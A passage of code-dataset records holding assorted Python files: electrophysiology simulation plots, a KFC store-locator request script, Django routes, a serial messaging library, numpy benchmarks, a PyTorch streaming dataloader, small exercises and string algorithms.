plot_profile(\n 'pr2-state-profile.png', d, 'Pr2 (Activation rate 40mV)', 5000,\n model=m)\n plot_profile_3d(\n 'pr2-state-profile-3d.png', d, 'Pr2 (Activation rate 40mV)', 5000,\n model=m)\n\n # Pr 3\n p = myokit.load_protocol(\n os.path.join('..', '7-stat-simulations', 'pr3-modified.mmt'))\n s = myokit.Simulation(m, p)\n d = s.run(p.characteristic_time())\n plot_profile(\n 'pr3-state-profile.png', d, 'Pr3 (Steady-state activation)', 8000,\n model=m)\n plot_profile_3d(\n 'pr3-state-profile-3d.png', d, 'Pr3 (Steady-state activation)', 8000,\n model=m)\n\n # Pr 4\n p = myokit.load_protocol(\n os.path.join('..', '7-stat-simulations', 'pr4-modified.mmt'))\n s = myokit.Simulation(m, p)\n d = s.run(p.characteristic_time())\n plot_profile(\n 'pr4-state-profile.png', d, 'Pr4 (Inactivation rate)', 3000, model=m)\n plot_profile_3d(\n 'pr4-state-profile-3d.png', d, 'Pr4 (Inactivation rate)', 3000,\n model=m)\n\n # Pr 5\n p = myokit.load_protocol(\n os.path.join('..', '7-stat-simulations', 'pr5-modified.mmt'))\n s = myokit.Simulation(m, p)\n d = s.run(p.characteristic_time())\n plot_profile(\n 'pr5-state-profile.png', d, 'Pr5 (Recovery rate)', 10500, model=m)\n plot_profile_3d(\n 'pr5-state-profile-3d.png', d, 'Pr5 (Recovery rate)', 10500, model=m)\n\nif True:\n # Pr 6 : APs, load protocol as waveform\n p = myokit.DataLog.load(os.path.join('..', '..', 'validation-data', 'ap.zip'))\n s = myokit.Simulation(m)\n s.set_fixed_form_protocol(p.time(), p['voltage'])\n s.set_max_step_size(0.1)\n d = s.run(8824)\n\n steps = [\n 0,\n 570,\n 1760,\n 5600,\n 7320,\n 8824,\n ]\n colors = [\n 'tab:blue', # Leak\n 'tab:orange', # Three waveforms\n 'tab:green', # Many APs\n 'tab:red', # EADs\n 'tab:blue', # Leak\n ]\n labels = [\n 'Leak',\n 'SAN/Vent/Atrial',\n 'Model APs',\n 'EAD APs',\n None,\n ]\n\n # Create legend of colours\n steps = zip(steps[:-1], steps[1:])\n plt.figure(figsize=(12, 5))\n plt.xlabel('Time (ms)')\n plt.ylabel('Command potential (mV)')\n for k, step in enumerate(steps):\n lo = d.find(step[0])\n hi = d.find(step[1])\n plt.plot(\n d.time()[lo:hi], d['membrane.V'][lo:hi],\n color=colors[k], label=labels[k])\n plt.grid(True)\n plt.legend(loc='lower center', ncol=2)\n plt.savefig('pr6-colours.png')\n\n plot_profile(\n 'pr6-state-profile.png', d, 'AP waveforms',\n steps_and_colors=(steps, colors), model=m)\n\n plot_profile_3d(\n 'pr6-state-profile-3d.png', d, 'AP waveforms',\n steps_and_colors=(steps, colors), model=m)\n\n\n# Pr 7 : Sine waves, load protocol as waveform\nif True:\n p = myokit.DataLog.load_csv(\n os.path.join('..', '..', 'sine-wave-data', 'sine-wave.csv'))\n s = myokit.Simulation(m)\n s.set_fixed_form_protocol(p.time(), p['voltage'])\n s.set_max_step_size(0.1)\n d = s.run(p.time()[-1])\n\n steps = [\n 0,\n 3000,\n 6500,\n 8000,\n ]\n colors = [\n 'tab:blue',\n 'tab:orange',\n 'tab:blue',\n ]\n labels = [\n 'Leak',\n 'Sine',\n None,\n ]\n\n # Create legend of colours\n steps = zip(steps[:-1], steps[1:])\n plt.figure(figsize=(12, 5))\n plt.xlabel('Time (ms)')\n plt.ylabel('Command potential (mV)')\n for k, step in enumerate(steps):\n lo = d.find(step[0])\n hi = d.find(step[1])\n plt.plot(\n d.time()[lo:hi], d['membrane.V'][lo:hi],\n color=colors[k], label=labels[k])\n plt.grid(True)\n plt.legend(loc='lower center', ncol=2)\n plt.savefig('pr7-colours.png')\n\n plot_profile(\n 'pr7-state-profile.png', d, 'Sine wave',\n steps_and_colors=(steps, colors), model=m)\n\n plot_profile_3d(\n 'pr7-state-profile-3d.png', d, 'Sine wave',\n steps_and_colors=(steps, colors), model=m)\n\nplt.show()\n","sub_path":"beattie-2017/phase-plane/profiles.py","file_name":"profiles.py","file_ext":"py","file_size_in_byte":5662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"346130083","text":"import requests\nimport os\nimport json\n\nfolder_path = './kfc/'\n\ndef location():\n post_url = 'http://www.kfc.com.cn/kfccda/ashx/GetStoreList.ashx?op=keyword'\n headers = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\",\n }\n post_data = {\n 'cname': '',\n 'pid': '',\n 'keyword': '北京',\n 'pageIndex': '1',\n 'pageSize': '1'\n }\n response = requests.post(url=post_url, data=post_data, headers=headers)\n json_txt = response.text\n file_path = folder_path + 'beijing_location.json'\n fp = open(file_path, 'w', encoding='utf-8')\n json.dump(json_txt, fp, ensure_ascii=False)\n print(file_path + ' saved!')\n\n\nif __name__ == '__main__':\n if not os.path.exists(folder_path):\n os.mkdir(folder_path)\n location()\n\n","sub_path":"kfc.py","file_name":"kfc.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"93553080","text":"# -- coding: utf-8 --\n\nfrom django.conf.urls import url\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nfrom formulas.run import FormulaExecuteView\nfrom formulas.views import FormulasListAPI, FormulaFunctionsListAPI, FormulasDetailAPI, FormulasTemplateAPI, \\\n FormulaVarietiesDetailAPI\n\nurlpatterns = [\n url(r'^$', FormulasListAPI.as_view()),\n url(r'^template/$', FormulasTemplateAPI.as_view()),\n url(r'^(?P[0-9]+)/$', FormulasDetailAPI.as_view()),\n url(r'^(?P[0-9]+)/varieties/(?P[0-9]+)/$', FormulaVarietiesDetailAPI.as_view()),\n url(r'^functions/', FormulaFunctionsListAPI.as_view()),\n url(r'^execute/', FormulaExecuteView.as_view()),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n","sub_path":"src/api/formulas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"577998247","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /usr/local/lib/python2.7/dist-packages/cmdmessenger/messenger.py\n# Compiled at: 2015-01-27 21:20:28\n__doc__ = '\\nuse stream.inWaiting to check if bytes are available\\n\\n A command is a python -> arduino\\n A callback is arduino -> python\\n\\n Commands are defined by dictionaries with:\\n name: [string] namespace name, only used for commands\\n id: [int] message id, only used for commands\\n params: [list of types, see params.py] if not present, no params\\n function: [callable] only used for callbacks\\n\\n'\nfrom . import params\n\nclass InvalidCommand(Exception):\n pass\n\n\ndef validate_command(cmd):\n if isinstance(cmd, (list, tuple)):\n return [ validate_command(c) for c in cmd ]\n if 'params' in cmd:\n for p in cmd['params']:\n if p not in params.types:\n raise InvalidCommand('Command %s unknown param %s' % (cmd, p))\n\n return True\n\n\ndef split_line(l, fs=',', ls=';', esc='\\\\'):\n sline = l.strip()\n start = 0\n if sline[(-1)] == ls:\n end = len(l) - 1\n else:\n end = len(l)\n if end <= start:\n raise Exception('Invalid line %s' % l)\n tokens = []\n while start < end:\n sub_line = sline[start:end]\n if fs not in sub_line:\n tokens.append(sub_line)\n break\n i = sub_line.index(fs)\n if i == 0:\n raise Exception('Invalid line %s' % l)\n while sub_line[(i - 1)] == esc:\n if len(sub_line) > 1 and sub_line[(i - 2)] == esc:\n break\n sub_sub_line = sub_line[i + 1:end]\n if fs not in sub_sub_line:\n i = end\n break\n i += sub_sub_line.index(fs) + 1\n\n tokens.append(sub_line[:i])\n start += i + 1\n if len(tokens) > 5:\n raise Exception\n\n return tokens\n\n\ndef escape(s, fs=',', ls=';', esc='\\\\'):\n if isinstance(s, (tuple, list)):\n return [ escape(i, esc) for i in s ]\n s = s.replace(esc, esc + esc)\n s = s.replace(fs, esc + fs)\n s = s.replace(ls, esc + ls)\n return s\n\n\ndef unescape(s, esc='\\\\'):\n if isinstance(s, (tuple, list)):\n return [ unescape(i, esc) for i in s ]\n return s.replace(esc, '')\n\n\nclass Messenger(object):\n\n def __init__(self, stream, cmds, fs=',', ls=';', esc='\\\\'):\n \"\"\"cmds should be a list\"\"\"\n self.stream = stream\n self.fs = fs\n self.ls = ls\n self.esc = esc\n validate_command(cmds)\n self.cmds = {}\n for i, c in enumerate(cmds):\n if not isinstance(c, dict):\n c = {'name': c}\n c['id'] = i\n self.cmds[i] = c\n if 'name' in c:\n self.cmds[c['name']] = c\n\n self.callbacks = {}\n\n def process_line(self, l):\n tokens = unescape(split_line(l, self.fs, self.ls, self.esc), self.esc)\n cmd_id = int(tokens[0])\n types = self.cmds[cmd_id].get('params', [])\n args = [ t['from'](a) for t, a in zip(types, unescape(tokens[1:])) ]\n if cmd_id not in self.callbacks:\n self.unknown(*args)\n else:\n self.callbacks[cmd_id](*args)\n\n def read_line(self):\n l = self.stream.read(1)\n esc = l[(-1)] == self.esc\n while l[(-1)] != self.ls or esc:\n l += self.stream.read(1)\n if esc:\n esc = False\n else:\n esc = l[(-1)] == self.esc\n\n return l\n\n def send(self, cmd_id, *args):\n msg = self.fs.join((str(cmd_id),) + tuple(escape(args))) + self.ls\n self.stream.write(msg)\n\n def attach(self, func, index):\n self.callbacks[index] = func\n\n def unknown(self, *args):\n pass\n\n def call(self, index, *args):\n cmd = self.cmds[index]\n types = cmd.get('params', [])\n self.send(cmd['id'], *[ t['to'](a) for t, a in zip(types, args) ])","sub_path":"pycfiles/cmdo-App-0.3.tar/messenger.py","file_name":"messenger.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"493930289","text":"import timeit\nfrom elements.utils import AttrDict, flatten\nimport numpy as np\nimport numba\nimport opt_einsum\nfrom elements.clib import multiple_dot_products\n\n# Test of multiple dot products:\n# An array of matrices (A) times array of matrices (B)\n# C[0] = A[0] * B[0]\n# C[1] = A[1] * B[1]\n# C[2] = A[2] * B[2]\n# ...\n\n\nsize = 4\nn = 10000\n\na = np.random.rand(n, size, size)\na_list = [a[i, :, :] for i in range(n)]\nnum = 10 # size of nested list\na_nested_list = [a_list[i:i + num] for i in range(n)[::10]]\ntester = 0\nb = np.random.rand(size, size)\n\n\nclass Structure:\n pass\n\n\ntwissdata = Structure()\n\ndef GPUimplementationwithopt_einsum():\n pass\n\ndef einsum():\n # BE =opt_einsum.contract('nij,jk->nik', matrix_array, B0, backend='numpy')\n BE = np.einsum('nik,kj->nij', a, b, optimize='optimal')\n # twissdata = AttrDict()\n twissdata.betax = BE[0, 0] # betax\n twissdata.betay = BE[2, 2] # betay\n twissdata.alphax = -BE[0, 1] # alphax\n twissdata.alphay = -BE[2, 3] # alphay\n twissdata.gammax = BE[1, 1] # gammax\n twissdata.gammay = BE[3, 3] # gammay\n return BE\n\n\ndef cCode():\n BE = np.empty((n, size, size))\n multiple_dot_products(a, b, BE)\n twissdata.betax = BE[0, 0] # betax\n twissdata.betay = BE[2, 2] # betay\n twissdata.alphax = -BE[0, 1] # alphax\n twissdata.alphay = -BE[2, 3] # alphay\n twissdata.gammax = BE[1, 1] # gammax\n twissdata.gammay = BE[3, 3] # gammay\n return BE\n\ndef dot_app():\n a.shape = n * size, size\n BE = np.dot(a, b)\n a.shape = n, size, size\n BE.shape = n, size, size\n # print(c.flags)\n twissdata = AttrDict()\n twissdata.betax = BE[0, 0] # betax\n twissdata.betay = BE[2, 2] # betay\n twissdata.alphax = -BE[0, 1] # alphax\n twissdata.alphay = -BE[2, 3] # alphay\n twissdata.gammax = BE[1, 1] # gammax\n twissdata.gammay = BE[3, 3] # gammay\n return BE\n\n\n@numba.jit(nopython=True, parallel=True)\ndef forloop():\n c = np.empty(a.shape)\n for i in numba.prange(a.shape[0]):\n c[i] = np.dot(a[i], b)\n return c\n\n\ndef dot_simple():\n BE = np.dot(a_list, b)\n # twissdata = Structure()\n twissdata.betax = BE[0, 0] # betax\n twissdata.betay = BE[2, 2] # betay\n twissdata.alphax = -BE[0, 1] # alphax\n twissdata.alphay = -BE[2, 3] # alphay\n twissdata.gammax = BE[1, 1] # gammax\n twissdata.gammay = BE[3, 3] # gammay\n return BE\n\n\ndef forloop_list():\n matrix_array = np.empty(a.shape)\n twissdata = AttrDict()\n twissdata.betax = np.empty(len(a_list))\n twissdata.betay = np.empty(len(a_list))\n twissdata.alphax = np.empty(len(a_list))\n twissdata.alphay = np.empty(len(a_list))\n twissdata.gammax = np.empty(len(a_list))\n twissdata.gammay = np.empty(len(a_list))\n for i, x in enumerate(a_list):\n matrix_array[i, :, :] = BE = np.dot(x, b)\n twissdata.betax[i] = BE[0, 0] # betax\n twissdata.betay[i] = BE[2, 2] # betay\n twissdata.alphax[i] = -BE[0, 1] # alphax\n twissdata.alphay[i] = -BE[2, 3] # alphay\n twissdata.gammax[i] = BE[1, 1] # gammax\n twissdata.gammay[i] = BE[3, 3] # gammay\n return matrix_array\n\n\ndef forloop_list_nested():\n c = np.empty(a.shape)\n index = 0\n for x in a_nested_list:\n for y in (x):\n c[index, :, :] = np.dot(y, b)\n index += 1\n return c\n\n\ndef einsum_list2array():\n a_array = np.array([y for x in a_nested_list for y in x])\n BE = np.einsum('nij,jk->nik', a_array, b)\n twissdata = AttrDict()\n twissdata.betax = BE[0, 0] # betax\n twissdata.betay = BE[2, 2] # betay\n twissdata.alphax = -BE[0, 1] # alphax\n twissdata.alphay = -BE[2, 3] # alphay\n twissdata.gammax = BE[1, 1] # gammax\n twissdata.gammay = BE[3, 3] # gammay\n return BE\n\n\nprint('\\nCheck numpy allclose:')\nprint('is equal = {}'.format(np.allclose(forloop(), einsum())))\nprint('is equal = {}'.format(np.allclose(dot_simple(), einsum())))\nprint('is equal = {}'.format(np.allclose(dot_app(), einsum())))\nprint('is equal = {}'.format(np.allclose(cCode(), einsum())))\nprint('is equal = {}'.format(np.allclose(forloop_list(), einsum())))\nprint('is equal = {}'.format(np.allclose(forloop_list_nested(), einsum())))\nprint('is equal = {}'.format(np.allclose(einsum_list2array(), einsum())))\n\nnumber = 1000\nprint(\"\\nProcessing speed:\")\nprint('einsum {:.9f}s'.format(timeit.timeit(\"einsum()\", setup=\"from __main__ import einsum\", number=number)))\nprint('cCode {:.9f}s'.format(timeit.timeit(\"cCode()\", setup=\"from __main__ import cCode\", number=number)))\nprint('dot_app {:.9f}s'.format(timeit.timeit(\"dot_app()\", setup=\"from __main__ import dot_app\", number=number)))\nprint('forloop {:.9f}s'.format(timeit.timeit(\"forloop()\", setup=\"from __main__ import forloop\", number=number)))\n# print('dot_simple {:.9f}s'.format(timeit.timeit(\"dot_simple()\", setup=\"from __main__ import dot_simple\", number=number)))\n# print('forloop_list {:.9f}s'.format(timeit.timeit(\"forloop_list()\", setup=\"from __main__ import forloop_list\", number=number)))\n# print('forloop_list_nested {:.9f}s'.format(timeit.timeit(\"forloop_list_nested()\", setup=\"from __main__ import forloop_list_nested\", number=number)))\n# print('einsum_list2array {:.9f}s'.format(timeit.timeit(\"einsum_list2array ()\", setup=\"from __main__ import einsum_list2array \", number=number)))\n\n\nindex = (np.random.randint(0, n - 1), np.random.randint(0, size - 1), np.random.randint(0, size - 1))\nindex = (0,0,0)\nprint('\\nTest element with index {}:'.format(index))\nprint(\"{:.15f}, {:.15f}\".format(forloop()[index], cCode()[index]))\nprint(\"{:.15f}, {:.15f}\".format(einsum()[index], dot_app()[index]))\n","sub_path":"tests/processing_speed/multiple_dot_products.py","file_name":"multiple_dot_products.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"632625020","text":"#!/usr/bin/python3\n\n\n\nfrom jk_flexdata import *\nfrom jk_infodatatree import DictValue\n\n\n\ndataTree = FlexObject({\n\t\"host_name\": \"test\"\n})\n\n\n\nspath, data = FlexDataSelector(\"|host_name\").getOne(dataTree)\nprint(repr(data))\n\nd = DictValue(data, None, None)\nd.dump()\n\n\n\n\n\n\n\n","sub_path":"testing/test_DictValue2.py","file_name":"test_DictValue2.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"415819191","text":"\ndef main():\n #Escribe tu código debajo de esta línea\n n = int(input('Enter triangle height: '))\n a=1\n sp= n - 1\n\n for i in range(a,n+1,1):\n print((' '* sp)+'*' * i)\n sp = sp - 1\n\nif __name__=='__main__':\n main()\n","sub_path":"assignments/25TrianguloAsteriscos/src/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"539203319","text":"import glob\nimport torch\nimport numpy as np\nimport threading\nimport cv2\nimport time\nimport random\n\nfrom torchvision.utils import make_grid\nfrom torch.utils.data import IterableDataset, DataLoader\n\nfrom torch._six import queue, container_abcs, string_classes\nfrom torch.utils.data._utils.pin_memory import pin_memory\nfrom torch.utils.data._utils import MP_STATUS_CHECK_INTERVAL\nfrom torch._utils import ExceptionWrapper\n\nfrom itertools import chain, cycle, islice\nfrom pytorch_streamloader.video_streamer import OpenCVStream\n\n\nclass MyIterableDataset(IterableDataset):\n def __init__(self, data_list, batch_size=4, tbins=5, max_frames_per_video=10):\n self.data_list = data_list\n self.batch_size = batch_size\n self.tbins = tbins\n self.max_frames_per_video = max_frames_per_video\n\n @property\n def shuffle_data_list(self):\n return random.sample(self.data_list, len(self.data_list))\n\n def process_data(self, data):\n stream = OpenCVStream(data, height=240, width=320, max_frames=self.max_frames_per_video)\n worker = torch.utils.data.get_worker_info()\n worker_id = worker.id if worker is not None else -1\n\n out = []\n for frame_num, x in enumerate(stream):\n ret, x = x\n if x is None:\n break\n out.append(x[None])\n if len(out) == self.tbins:\n y = np.concatenate(out)\n out = []\n yield y[:,None]\n\n def get_stream(self, data_list):\n print('number of files to stream: ', len(data_list))\n tmp = map(self.process_data, iter(data_list))\n out = chain.from_iterable(tmp)\n return out\n\n def __iter__(self):\n # here we should create equal partitions\n chunk_size = len(self.data_list) // self.batch_size \n return zip(\n *[self.get_stream(self.data_list[i*chunk_size:(i+1)*chunk_size]) for i in range(self.batch_size)]\n )\n \n # here it is just randomly sampled\n # return zip(\n # *[self.get_stream(self.shuffle_data_list) for _ in range(self.batch_size)]\n # )\n\n @classmethod\n def split_datasets(cls, data_list, batch_size, tbins, max_workers):\n for n in range(max_workers, 0, -1):\n if batch_size % n == 0:\n num_workers = n\n break\n #here we partition the original data_list.\n split_size = batch_size // num_workers\n num_files_per_worker = len(data_list) // num_workers\n out = []\n for i in range(num_workers):\n start = i * num_files_per_worker\n end = (i + 1) * num_files_per_worker\n stream_files = data_list[start:end]\n item = cls(stream_files, batch_size=split_size, tbins=tbins)\n out.append(item)\n return out\n\n\nclass MultiStreamDataLoader:\n def __init__(self, datasets, pin_memory=True):\n self.datasets = datasets\n self.pin_memory = pin_memory\n\n def get_stream_loaders(self):\n dataloaders = [\n DataLoader(dataset, num_workers=1, batch_size=None, pin_memory=True)\n for dataset in self.datasets\n ]\n return zip(*dataloaders)\n\n def join_streams_thread(self, out_queue, device_id, done_event):\n \"\"\"\n additional thread putting data into a queue to be collected from __iter__\n \"\"\"\n torch.set_num_threads(1)\n torch.cuda.set_device(device_id)\n\n for idx, batch_parts in enumerate(self.get_stream_loaders()):\n data = list(chain(*batch_parts))\n\n data = torch.cat([item[:, None] for item in data], dim=1)\n if (\n not done_event.is_set()\n and not isinstance(data, ExceptionWrapper)\n ):\n data = pin_memory(data)\n\n out_queue.put(data, timeout=MP_STATUS_CHECK_INTERVAL)\n\n self._join_memory_thread_done_event.set()\n\n def __iter__(self):\n # define a thread for collation & memory pinning here\n if self.pin_memory:\n self._join_memory_thread_done_event = threading.Event()\n self._data_queue = queue.Queue()\n self.join_memory_thread = threading.Thread(\n target=self.join_streams_thread,\n args=(\n self._data_queue,\n torch.cuda.current_device(),\n self._join_memory_thread_done_event,\n ),\n )\n self.join_memory_thread.daemon = True\n self.join_memory_thread.start()\n \n while not self._join_memory_thread_done_event.is_set():\n batch = self._data_queue.get(timeout=100000)\n batch = {'data':batch}\n yield batch\n self.join_memory_thread.join()\n else:\n # Single-Process\n for batch_parts in self.get_stream_loaders():\n data = list(chain(*batch_parts))\n batch = torch.cat([item[:, None] for item in data], dim=1)\n batch = {'data':batch}\n yield batch\n\n","sub_path":"pytorch_iterable.py","file_name":"pytorch_iterable.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"391820678","text":"import os \r\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'project_exercise.settings')\r\n\r\nimport django \r\ndjango.setup()\r\n\r\n# Faker Pop script \r\nimport random \r\nfrom users.models import User\r\nfrom faker import Faker\r\n\r\nfake_gen = Faker()\r\n\r\ndef add_user(N=5):\r\n for i in range(N):\r\n first_name= fake_gen.first_name()\r\n last_name = fake_gen.last_name()\r\n email = fake_gen.email()\r\n user = User.objects.get_or_create(first_name = first_name, last_name = last_name, email = email)[0]\r\n user.save()\r\n\r\nif __name__ == '__main__':\r\n print(\"Populating users .....\")\r\n add_user(20)\r\n print(\"populating completed!\")","sub_path":"Django-level-3/project_exercise/populate_users.py","file_name":"populate_users.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"538808810","text":"import numpy as np\n\n\ndef one_hot_vec(index, size, reuse_vec=None):\n vec = reuse_vec if reuse_vec is not None else np.empty(size, dtype=float)\n vec.fill(0)\n vec[index] = 1\n return vec\n\n\ndef softmax(in_vec):\n exp = np.exp(in_vec)\n return exp / np.sum(exp)\n\n\ndef softmax_drv(in_vec):\n dim = len(in_vec)\n soft = softmax(in_vec)\n identity = np.identity(dim)\n jacob_mat = np.asmatrix(np.zeros(dim * dim)).reshape(dim, dim)\n for i in range(dim):\n soft_i = soft[i]\n for j in range(dim):\n ident = identity[i][j]\n soft_j = soft[j]\n drv = soft_i * (ident - soft_j)\n jacob_mat[i, j] = drv\n return jacob_mat\n\n\ndef softmax_slope(in_vec):\n dim = len(in_vec)\n soft = softmax(in_vec)\n delta = 0.001\n jacob_mat = np.asmatrix(np.zeros(dim * dim)).reshape(dim, dim)\n for i in range(dim):\n in_vec[i] += delta\n new_soft = softmax(in_vec)\n for j in range(dim):\n jacob_mat[i, j] = (new_soft[j] - soft[j]) / delta\n in_vec[i] -= delta\n return jacob_mat\n\n\ndef tanh(in_vec):\n return np.tanh(in_vec)\n\n\ndef tanh_drv(in_vec):\n return np.negative(np.square(np.tanh(in_vec))) + 1\n\n\ndef jacobian(in_vec, out_grads):\n dim = len(in_vec)\n in_mat = np.asmatrix(in_vec).reshape(dim, 1)\n grad_mat = np.asmatrix(out_grads).reshape(1, dim)\n return np.copy(np.dot(in_mat, grad_mat))\n\n\ndef from_jacobian(matrix):\n # sums matrix columns\n #\n # [ [ 0, 1, 2]\n # [ 3, 4, 5] --> [9, 12, 15]\n # [ 6, 7, 8] ] \n #\n # SHOULD return one rank less but for some\n # reason always returns same rank\n\n return np.sum(matrix, axis=0).flatten()\n\n\n","sub_path":"src/numpy_rnn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"474186144","text":"import tensorflow as tf\nimport os\nimport collections\nfrom six.moves import cPickle\nimport numpy as np\n\n\nclass TextLoader():\n def __init__(self, session, data_dir, batch_size, seq_length, encoding='utf-8'):\n self.session = session\n self.data_dir = data_dir\n self.batch_size = batch_size\n self.seq_length = seq_length\n self.encoding = encoding\n\n input_file = os.path.join(data_dir, \"input.txt\")\n vocab_file = os.path.join(data_dir, \"vocab.pkl\")\n tensor_file = os.path.join(data_dir, \"data.npy\")\n\n if True or not (os.path.exists(vocab_file) and os.path.exists(tensor_file)):\n print(\"reading text file\")\n self.preprocess(input_file, vocab_file, tensor_file)\n else:\n print(\"loading preprocessed files\")\n self.load_preprocessed(vocab_file, tensor_file)\n\n self.create_batches()\n self.reset_batch_pointer()\n\n def preprocess(self, input_file, vocab_file, tensor_file):\n line_data = tf.data.TextLineDataset([input_file])\n\n chars_data = line_data\\\n .map(lambda l: tf.string_split([l], '').values)\n\n next_char_list = chars_data.make_one_shot_iterator().get_next()\n counter = collections.Counter()\n\n megacharlist = []\n\n while True:\n try:\n next_chars = self.session.run(next_char_list)\n counter.update(next_chars)\n\n # hack?\n megacharlist.extend(next_chars)\n megacharlist.append('\\n')\n counter['\\n'] += 1 # hack?\n\n except tf.errors.OutOfRangeError:\n break # done\n\n count_pairs = sorted(counter.items(), key=lambda x: -x[1])\n self.chars, _ = zip(*count_pairs)\n self.vocab_size = len(self.chars)\n self.vocab = dict(zip(self.chars, range(len(self.chars))))\n\n self.input_dataset = chars_data\n\n # hack: still using concatenated tensor format\n self.tensor = np.array(map(self.vocab.get, megacharlist))\n\n def load_preprocessed(self, vocab_file, tensor_file):\n with open(vocab_file, 'rb') as f:\n self.chars = cPickle.load(f)\n self.vocab_size = len(self.chars)\n self.vocab = dict(zip(self.chars, range(len(self.chars))))\n self.tensor = np.load(tensor_file)\n self.num_batches = int(self.tensor.size / (self.batch_size *\n self.seq_length))\n\n def create_batches(self):\n self.num_batches = int(self.tensor.size / (self.batch_size *\n self.seq_length))\n\n # When the data (tensor) is too small,\n # let's give them a better error message\n if self.num_batches == 0:\n assert False, \"Not enough data. Make seq_length and batch_size small.\"\n\n self.tensor = self.tensor[:self.num_batches * self.batch_size * self.seq_length]\n xdata = self.tensor\n ydata = np.copy(self.tensor)\n ydata[:-1] = xdata[1:]\n ydata[-1] = xdata[0]\n self.x_batches = np.split(xdata.reshape(self.batch_size, -1),\n self.num_batches, 1)\n self.y_batches = np.split(ydata.reshape(self.batch_size, -1),\n self.num_batches, 1)\n\n def next_batch(self):\n x, y = self.x_batches[self.pointer], self.y_batches[self.pointer]\n self.pointer += 1\n return x, y\n\n def reset_batch_pointer(self):\n self.pointer = 0\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"447208325","text":"\"\"\"\nzadanie 63, zbiór zadań CKE\n\"\"\"\n\n\ndef dwucykliczny(n):\n if len(n) % 2 != 0:\n return False\n p = int(len(n) / 2)\n if n[:p] == n[p:]:\n return True\n\n\ndef nie_kolo_siebie(n):\n ok = True\n i = 0\n while i < len(n) - 1:\n if n[i] == \"1\" and n[i+1] == \"1\":\n ok = False\n break\n i += 1\n return ok\n\n\ndef rozklad(n):\n czynniki = []\n k = 2\n while n != 1:\n while n % k == 0:\n n //= k\n czynniki.append(k)\n k += 1\n return czynniki\n\n\ntablica1 = []\nlicznik2 = 0\nlicznik3 = 0\nmin3 = 262143\nmax3 = 0\nwith open(\"ciagi.txt\", \"r\") as plik:\n for L in plik:\n L = L.strip()\n # 63.1\n if dwucykliczny(L):\n tablica1.append(L)\n # 63.2\n if nie_kolo_siebie(L):\n licznik2 += 1\n # 63.3\n l_dzies = int(L, 2)\n if len(rozklad(l_dzies)) == 2:\n licznik3 += 1\n if l_dzies < min3:\n min3 = l_dzies\n if l_dzies > max3:\n max3 = l_dzies\n\nwith open(\"wyniki_ciagi.txt\", \"w\") as odp:\n odp.write(\"63.1\\n\")\n for C in tablica1:\n odp.write(C + \"\\n\")\n odp.write(\"\\n63.2\\n\" + str(licznik2))\n odp.write(\"\\n\\n63.3\\n\" + \"Ilość półpierwszych: \" + str(licznik3) + \"\\n\" +\n \"Najmniejsza: \" + str(min3) + \"\\n\" +\n \"Największa: \" + str(max3))","sub_path":"Programowanie/63 - zrobione/zadanie63.py","file_name":"zadanie63.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"421977125","text":"from SuffixBorderArray import SuffixBorderArray\n\ndef SuffixBorderArrayModified(s):\n bp = SuffixBorderArray(s)\n n = len(s)\n bpm = [0 for i in range(n)]\n bpm[n - 1] = bp[n - 1]\n for i in range(0, n - 1):\n if bp[i] and s[bp[i]] == s[i + 1]:\n bpm[i] = bpm[bp[i] - 1]\n else:\n bpm[i] = bp[i]\n print('Модифицированный массив граней:', bpm)\n return bpm\n\n\nif __name__ == \"__main__\":\n # Тест\n # s = ABAAABAСBСAABAAAB\n print(\"Массив граней суффиксов:\", SuffixBorderArrayModified(s = input('Строка:')))","sub_path":"algorythms/SuffixBorderArrayModified.py","file_name":"SuffixBorderArrayModified.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"360592067","text":"#!/usr/bin/env python\n\n\n# test.py\n\n# Copyright (C) 2014 Santosh Thoduka\n\n# This software may be modified and distributed under the terms\n# of the MIT license. See the LICENSE file for details.\n\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom ego_flow import EgomotionFlow\nfrom motion_flow import MotionFlow\nfrom trajectory_flow import TrajectoryFlow\nfrom fit_subspace import get_fit_error\n\nheight = 240\nwidth = 320\nstep = 10 \n\nmf = MotionFlow()\nef = 